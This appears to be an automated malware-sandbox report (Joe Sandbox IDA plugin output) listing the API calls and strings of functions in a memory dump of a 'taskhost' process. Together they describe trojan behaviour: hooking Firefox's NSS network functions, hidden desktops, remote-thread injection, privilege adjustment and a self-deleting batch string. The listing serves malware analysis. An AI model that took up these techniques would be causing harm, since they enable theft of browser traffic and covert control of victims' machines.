Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

CloseHandle.KERNEL32(00000000), ref: 005152B5

Part of subcall function 00518716: SetFileAttributesW.KERNEL32(00000080,00000080,0051B4CD,?), ref: 0051871F
Part of subcall function 00518716: DeleteFileW.KERNEL32(?), ref: 00518729

Strings

PSZSdS2SnS<SFS, xrefs: 00515267

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051C5CA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64

APIs

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 0051C5ED
EnterCriticalSection.KERNEL32(0052400C), ref: 0051C620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0051C640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 0051C64C

Part of subcall function 0050C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,005120A9), ref: 0050C111
Part of subcall function 0050C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,005120A9), ref: 0050C125
Part of subcall function 0050C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0050C132
Part of subcall function 0050C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0050C13F
Part of subcall function 0050C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0050C14C

LeaveCriticalSection.KERNEL32(0052400C), ref: 0051C669

Strings

nspr4.dll, xrefs: 0051C63A
nss3.dll, xrefs: 0051C646

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005169AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(00522C3C,00000001,00000000,005122ED,?,?,00000000), ref: 005169B4
SetSecurityDescriptorDacl.ADVAPI32(00522C3C,00000001,00000000,00000000,?,?,00000000), ref: 005169C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 005169DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 005169F7
SetSecurityDescriptorSacl.ADVAPI32(00522C3C,?,?,?,?,?,00000000), ref: 00516A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00516A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 005169D6

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051B58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(00523FE4,76C61857,0050C185,00522360), ref: 0051B5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0051B5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 0051B5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 0051B602

Strings

PR_GetError, xrefs: 0051B5F2
PR_SetError, xrefs: 0051B5E0
PR_GetNameForIdentity, xrefs: 0051B5BE

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00507206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 00516444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00516463
Part of subcall function 00516444: freeaddrinfo.WS2_32(?,?,?,?,?,00507284,?), ref: 005164B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 005072EB
SetThreadPriority.KERNEL32(00000000), ref: 005072F2

Part of subcall function 0051D865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 0051D88A
Part of subcall function 0051D865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 0051D89D
Part of subcall function 0051D865: GetProcessWindowStation.USER32 ref: 0051D8AE
Part of subcall function 0051D865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0051D8E9
Part of subcall function 0051D865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0051D8FD
Part of subcall function 0051D865: GetCurrentThreadId.KERNEL32(?,?,?,0050731A,?,2937498D,?,00000000), ref: 0051D909
Part of subcall function 0051D865: GetThreadDesktop.USER32(00000000), ref: 0051D910
Part of subcall function 0051D865: SetThreadDesktop.USER32(00000000), ref: 0051D922
Part of subcall function 0051D865: CloseDesktop.USER32(00000000), ref: 0051D934
Part of subcall function 0051D865: CloseWindowStation.USER32(?), ref: 0051D94F

Part of subcall function 0050DD09: TlsAlloc.KERNEL32(00522868,00000000,0000018C,00000000,00000000), ref: 0050DD22
Part of subcall function 0050DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0050DD4A
Part of subcall function 0050DD09: CreateEventW.KERNEL32(00522C30,00000001,00000000,?,84889912,?,00000001), ref: 0050DD74
Part of subcall function 0050DD09: CreateMutexW.KERNEL32(00522C30,00000000,?,18782822,?,00000001), ref: 0050DD97
Part of subcall function 0050DD09: CreateFileMappingW.KERNEL32(00000000,00522C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0050DDC2
Part of subcall function 0050DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0050DDD8
Part of subcall function 0050DD09: GetDC.USER32(00000000), ref: 0050DDF5
Part of subcall function 0050DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0050DE15
Part of subcall function 0050DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0050DE1F
Part of subcall function 0050DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0050DE32
Part of subcall function 0050DD09: ReleaseDC.USER32(00000000,?), ref: 0050DE56
Part of subcall function 0050DD09: CreateMutexW.KERNEL32(00522C30,00000000,?,1898B122,?,00000001,005228B8,?,00000102,005228A4,00522E70,00000010,?,?), ref: 0050DF00
Part of subcall function 0050DD09: GetDC.USER32(00000000), ref: 0050DF15
Part of subcall function 0050DD09: CreateCompatibleDC.GDI32(00000000), ref: 0050DF23
Part of subcall function 0050DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0050DF3A
Part of subcall function 0050DD09: SelectObject.GDI32(00000000,00000000), ref: 0050DF4D
Part of subcall function 0050DD09: ReleaseDC.USER32(00000000,00000001), ref: 0050DF65

GetShellWindow.USER32 ref: 00507338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 0050736B

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 005073CD
CloseHandle.KERNEL32(?), ref: 005073DD
CloseHandle.KERNEL32(?), ref: 005073E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 005073F2

Part of subcall function 0050D4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,0050E1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 0050D714
Part of subcall function 0050D4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0050D72F
Part of subcall function 0050D4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0050D7C1
Part of subcall function 0050D4B4: GetSystemMetrics.USER32(00000017), ref: 0050D8DB
Part of subcall function 0050D4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0050DC67

Part of subcall function 0050DF74: DeleteObject.GDI32(00000000), ref: 0050DF87
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050DF97
Part of subcall function 0050DF74: TlsFree.KERNEL32(00000000,00000000,00522868,00000000,0050E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0050DFA2
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050DFB0
Part of subcall function 0050DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00522868,00000000,0050E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0050DFBA
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050DFC7
Part of subcall function 0050DF74: SelectObject.GDI32(00000000,00000000), ref: 0050DFE1
Part of subcall function 0050DF74: DeleteObject.GDI32(00000000), ref: 0050DFF2
Part of subcall function 0050DF74: DeleteDC.GDI32(00000000), ref: 0050DFFF
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050E010
Part of subcall function 0050DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0050E01F
Part of subcall function 0050DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0050E038

Part of subcall function 005165B7: recv.WS2_32(?,?,00000400,00000000), ref: 00516600
Part of subcall function 005165B7: #19.WS2_32(?,?,00000000,00000000), ref: 0051661A
Part of subcall function 005165B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00516657

Part of subcall function 0051675E: shutdown.WS2_32(?,00000002), ref: 00516766
Part of subcall function 0051675E: #3.WS2_32(?,?,?,?), ref: 0051676D

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 005167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 005167CC

Part of subcall function 00516774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 005167A7

Part of subcall function 00516403: socket.WS2_32(?,00000001,00000006), ref: 0051640C
Part of subcall function 00516403: connect.WS2_32(00000000,?,-0000001D), ref: 0051642C
Part of subcall function 00516403: #3.WS2_32(00000000), ref: 00516437

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005131CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005131ED
Process32FirstW.KERNEL32(000001E6,?), ref: 00513216

Part of subcall function 0051245B: CreateMutexW.KERNEL32(00522C30,00000001,?,00522E70,76C605D7,?,00000002,?,76C605D7), ref: 005124A3
Part of subcall function 0051245B: GetLastError.KERNEL32 ref: 005124AF
Part of subcall function 0051245B: CloseHandle.KERNEL32(00000000), ref: 005124BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00513271
CloseHandle.KERNEL32(?), ref: 0051330E

Part of subcall function 005149D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00512326,000000FF,00522C08,?,?,00000000), ref: 005149E2
Part of subcall function 005149D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00512326,000000FF,00522C08), ref: 00514A0E
Part of subcall function 005149D2: CloseHandle.KERNEL32(?), ref: 00514A23

CloseHandle.KERNEL32(00000000), ref: 0051328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 005132A1

Part of subcall function 00513346: HeapAlloc.KERNEL32(00000008,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?,?), ref: 00513368
Part of subcall function 00513346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?), ref: 00513379

Part of subcall function 00513048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 00513157
Part of subcall function 00513048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00A35903,00000000,00000000,00000000), ref: 00513185
Part of subcall function 00513048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00513198
Part of subcall function 00513048: CloseHandle.KERNEL32(?), ref: 005131A1
Part of subcall function 00513048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 005131B5
Part of subcall function 00513048: CloseHandle.KERNEL32(00000000), ref: 005131BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 0051331A
CloseHandle.KERNEL32(000001E6), ref: 0051332B

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050B11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0050B130
ReleaseMutex.KERNEL32(?), ref: 0050B14F
GetWindowRect.USER32(?,?), ref: 0050B15C
IsRectEmpty.USER32(?), ref: 0050B1E0
GetWindowLongW.USER32(?,000000F0), ref: 0050B1EF
GetParent.USER32(?), ref: 0050B205
MapWindowPoints.USER32(00000000,00000000), ref: 0050B20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0050B232

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005114C3, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367

APIs

Part of subcall function 0051433F: CharLowerA.USER32(00000000), ref: 00514420
Part of subcall function 0051433F: CharLowerA.USER32(?), ref: 0051442D

Part of subcall function 00513346: HeapAlloc.KERNEL32(00000008,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?,?), ref: 00513368
Part of subcall function 00513346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?), ref: 00513379

Part of subcall function 00517FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 00518104

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

InternetCrackUrlA.WININET ref: 005117AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 005117CA

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

LeaveCriticalSection.KERNEL32(00522AC8,?,?), ref: 0051194D

Part of subcall function 00514660: CryptAcquireContextW.ADVAPI32(00518C87,00000000,00000000,00000001,F0000040,?,00518C87,?,00000030,?,?,?,005191A0,00523EC0), ref: 00514679
Part of subcall function 00514660: CryptCreateHash.ADVAPI32(00518C87,00008003,00000000,00000000,00000030,?,00518C87,?,00000030,?,?,?,005191A0,00523EC0), ref: 00514691
Part of subcall function 00514660: CryptHashData.ADVAPI32(00000030,00000010,00518C87,00000000,?,00518C87), ref: 005146AD
Part of subcall function 00514660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00518C87), ref: 005146C5
Part of subcall function 00514660: CryptDestroyHash.ADVAPI32(00000030,?,00518C87), ref: 005146DC
Part of subcall function 00514660: CryptReleaseContext.ADVAPI32(00518C87,00000000,?,00518C87,?,00000030,?,?,?,005191A0,00523EC0), ref: 005146E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 005118E4

Part of subcall function 0051763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00519EAB,?,?,00000004), ref: 00517658
Part of subcall function 0051763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00519EAB,?,?,00519EAB,?,?,00000004,?,00000004), ref: 00517672
Part of subcall function 0051763A: RegCloseKey.ADVAPI32(00000004,?,?,00519EAB,?,?,00000004,?,00000004), ref: 00517681

EnterCriticalSection.KERNEL32(00522AC8), ref: 00511910

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

?*, xrefs: 005114FD

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051A298, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 0051A2A6

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

InternetSetStatusCallbackW.WININET(?,0051A24F), ref: 0051A2DB
InternetReadFileExA.WININET ref: 0051A31B
GetLastError.KERNEL32 ref: 0051A325

Part of subcall function 00516B28: TranslateMessage.USER32(?), ref: 00516B4A
Part of subcall function 00516B28: DispatchMessageW.USER32(?), ref: 00516B55
Part of subcall function 00516B28: PeekMessageW.USER32(00000000), ref: 00516B65
Part of subcall function 00516B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00516B79

InternetSetStatusCallbackW.WININET(?,?), ref: 0051A389

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 00513346: HeapAlloc.KERNEL32(00000008,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?,?), ref: 00513368
Part of subcall function 00513346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?), ref: 00513379

Strings

ZSdS2SnS<SFS, xrefs: 0051A31B

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00514E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 00518737: GetTempPathW.KERNEL32(000000F6,?), ref: 0051874E

CharToOemW.USER32(?,?), ref: 00514EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00514F2F

Part of subcall function 00518716: SetFileAttributesW.KERNEL32(00000080,00000080,0051B4CD,?), ref: 0051871F
Part of subcall function 00518716: DeleteFileW.KERNEL32(?), ref: 00518729

Part of subcall function 0051856B: CreateFileW.KERNEL32(00514E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00518585
Part of subcall function 0051856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005185A8
Part of subcall function 0051856B: CloseHandle.KERNEL32(00000000), ref: 005185B5

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Strings

bat, xrefs: 00514E8B
@echo off%sdel /F "%s", xrefs: 00514EBE
ComSpec, xrefs: 00514F2A
/c "%s", xrefs: 00514F01

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 0051797D
PathAddBackslashW.SHLWAPI(?), ref: 00517994
PathRemoveBackslashW.SHLWAPI(?), ref: 005179A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 005179B2
PathAddBackslashW.SHLWAPI(?), ref: 005179C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 005179D2
CLSIDFromString.OLE32(?,?), ref: 005179EC

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005178D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 005178FD

Part of subcall function 0051773A: CharUpperW.USER32(00000000), ref: 0051785B

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0051792F
RegCloseKey.ADVAPI32(?), ref: 00517938
RegCloseKey.ADVAPI32(?), ref: 00517952

Strings

d, xrefs: 00517943
SOFTWARE\Microsoft, xrefs: 005178F0

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00514A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,0051C9A1,00000000,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,0051C9A1,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514AB0
LookupPrivilegeValueW.ADVAPI32(00000000,0051C9A1,?), ref: 00514AD4
AdjustTokenPrivileges.ADVAPI32(0051C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00514AE9
GetLastError.KERNEL32 ref: 00514AF3
CloseHandle.KERNEL32(0051C9A1), ref: 00514B02

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00516A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 00514A87: GetCurrentThread.KERNEL32(00000020,00000000,0051C9A1,00000000,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514A97
Part of subcall function 00514A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514A9E
Part of subcall function 00514A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0051C9A1,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514AB0
Part of subcall function 00514A87: LookupPrivilegeValueW.ADVAPI32(00000000,0051C9A1,?), ref: 00514AD4
Part of subcall function 00514A87: AdjustTokenPrivileges.ADVAPI32(0051C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00514AE9
Part of subcall function 00514A87: GetLastError.KERNEL32 ref: 00514AF3
Part of subcall function 00514A87: CloseHandle.KERNEL32(0051C9A1), ref: 00514B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 00516A5B
GetSecurityDescriptorSacl.ADVAPI32(?,00000000,?,00000000), ref: 00516A77
SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 00516A8E
LocalFree.KERNEL32(?), ref: 00516A9D

Strings

SeSecurityPrivilege, xrefs: 00516A43
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 00516A56

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050B31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 0050B345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0050B370
PostMessageW.USER32(?,00000020,?,00000000), ref: 0050B3B2

Part of subcall function 0050B23D: GetTickCount.KERNEL32 ref: 0050B2A3
Part of subcall function 0050B23D: GetClassLongW.USER32(?,000000E6), ref: 0050B2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 0050B448
PostMessageW.USER32(?,00000112,?,?), ref: 0050B49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0050B4DA

Part of subcall function 0050B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0050B0B3
Part of subcall function 0050B0AD: ReleaseMutex.KERNEL32(?), ref: 0050B0E7
Part of subcall function 0050B0AD: IsWindow.USER32(?), ref: 0050B0EE
Part of subcall function 0050B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0050B108
Part of subcall function 0050B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0050B110

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00509694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00509709
StrStrIW.SHLWAPI(?,?), ref: 00509796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 005097BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 005097DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 0050980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 0050982D

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 005092D4
StrStrIW.SHLWAPI(?,?), ref: 0050935C
StrStrIW.SHLWAPI(?,?), ref: 0050936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00509389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 005093A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 005093C1

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00511049, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395

APIs

EnterCriticalSection.KERNEL32(00522AC8), ref: 00511064
LeaveCriticalSection.KERNEL32(00522AC8), ref: 005110E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 005111B2

Part of subcall function 0051AE54: EnterCriticalSection.KERNEL32(00523FB4,?,005111CF,?), ref: 0051AE5B
Part of subcall function 0051AE54: LeaveCriticalSection.KERNEL32(00523FB4), ref: 0051AE90

Part of subcall function 0051AE9A: EnterCriticalSection.KERNEL32(00523FB4,?,00000000,005113AE,00000000), ref: 0051AEA6
Part of subcall function 0051AE9A: LeaveCriticalSection.KERNEL32(00523FB4), ref: 0051AEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 005113EC

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 00510AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00510C73
Part of subcall function 00510AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00510C93
Part of subcall function 00510AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00510CA6
Part of subcall function 00510AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00510CB5

Part of subcall function 00519B3E: CreateMutexW.KERNEL32(Function_00022C30,00000000,00523F40,?,?,?,005079E5), ref: 00519B66

Strings

, xrefs: 00511301

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051D325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 00512828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 005128A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0051D34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 0051D35D

Part of subcall function 0051C86B: SetEvent.KERNEL32(0051D36D,00000000), ref: 0051C871
